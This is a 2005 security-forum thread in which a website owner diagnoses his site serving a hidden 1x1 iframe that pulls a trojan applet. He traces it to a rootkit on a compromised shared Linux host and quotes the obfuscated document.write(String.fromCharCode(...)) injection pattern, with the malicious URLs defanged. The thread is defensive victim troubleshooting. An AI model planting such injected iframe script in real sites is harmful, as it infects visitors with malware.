My website tries to access a trojan off of another site

Discussion in 'malware problems & news' started by JC2, Mar 7, 2005.

Thread Status:
Not open for further replies.
  1. JC2

    JC2 Registered Member

    Mar 7, 2005

    A couple days ago I started noticing some odd behavior with my website. At random times when I'd load a site page in my browser, I would see the following message in my browser's status bar:

    "transferring data from hxxp:// . . . GetAccess.class"

    Seconds after seeing that message, my AV software (avast 4.6 on-access scanner) reported that it found the following viruses:

    1. JS:ClassLoader-7
    2. JS:Exploit-Bytverify-11
    3. VBS:Malware[Gen]
    4. Win32: Trojano-477[Trj]

    It recommended that I abort the connection. After doing so, the browser's status bar read "Applet GetAccess notinited".

    At first I thought this might be a problem with my pc and not my website. I updated and ran my AV software, Spybot Search & Destroy, and AdAware. but didn't find anything. My pc doesn't exhibit any odd behavior otherwise. No other websites seem to bring about this problem.

    I also accessed my site with another pc and it too discovered the same problem. It's Norton AV software also caught the virus before it could infect the computer.

    Next I thought the problem might lie in my website files. I backed-up the entire website and then deleted everything on the webserver --still no luck. If I just go to the URL of my site, which is now an empty directory, and hit reload enough times, it will eventually do the same thing (attempt to contact the foreign server and execute the trojan applet)

    Finally I tried contacting my webhost tech support and explained everything to them. I was told that it was my problem not their's because this is a windows virus and their servers are linux. They said it was impossible for a linux server to spread a windows virus. It didn't seem to matter to them that the virus being executed is located on a foreign server. They are sure that their server is safe and secure.

    So I'm at a loss for what to do. I've tested everything I can think of and spent many hours trying to find a solution. Is there a better approach to solving this? Any advice is greatly appreciated.

    Thanks for your help.

    All the best,
    Last edited by a moderator: Mar 7, 2005
  2. Bubba

    Bubba Updates Team

    Apr 15, 2002
    Hey JC....Welcome Wilders [​IMG]

    I'm not sure this will help you any but we had a kind of similar thread back in December concerning that padonak scum bag site.

    This thread---> Padonak./fa/hta.php/object.cfm
  3. JC2

    JC2 Registered Member

    Mar 7, 2005
    Thanks Bubba! :D It's good to know that other's have successfully dealt with this problem. One of the hardest things about this has been knowing what the problem actually is, so that I can find info on it.

    In the thread you pointed me to, Laurie included links to some info at that were particularly helpful. The pdf document there gives a detailed analysis of what's happening.

    Based on their information it appears that what I'm dealing with is a variant of the Xpire/SplitInfinity Exploit. It happens when hackers do the following:
    1. Through various exploits, they hack a linux server running apache
    2. They use a variant of the SuckIt rootkit to dynamically inject javascript into the headers of random web pages that are sent from the web server to user's web browsers.
    3. The javascript creates a tiny IFRAME that is invisible to users. It's source is another website that the hackers use to install a bundle of malware on to user's pc's.

    Originally the websites that these iframes referenced were hxxp:// and hxxp:// Now they are also using hxxp://

    According to this article, The hacker team responsible calls itself HangUp, and they've been known to be working on a padonok project (a misspelling of the word 'podonok' which apparently means 'scum')

    I checked this against what happens on my own website and found that javascript is indeed being injected into random web page headers. In my case, the fact that it was creating an iframe was more concealed than in the orginal xpire/splitinfinity version. Instead of being written in plain text, it was hidden in unicode:

    document.write(String.fromCharCode([a long series of unicode numbers]))

    Sure enough, when I translated the values it read:
    "iframe height=1 width=1 src=hxxp://"

    Now that I've identified the problem, there remains the question of how the server was compromised and what to do about it. Unfortunately, it seems that this is out of my hands. I don't use the software (PHPBB through OpenSSL) that the hacker's exploited to access the server, but maybe someone else on the shared server does. Also, the unwillingness of my webhost's tech support to look into this means I'll probably have to move webhosts.

    Well, thanks again for pointing me in the right direction. I've tried to include enough basic information here so that anyone else with this problem can understand what's going on in less time than it took me.

  4. Larpo

    Larpo Guest

    My site also seems to be affected by this virus. Do you have any idea how plug the security breach... I'm losing users rapidly!!
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.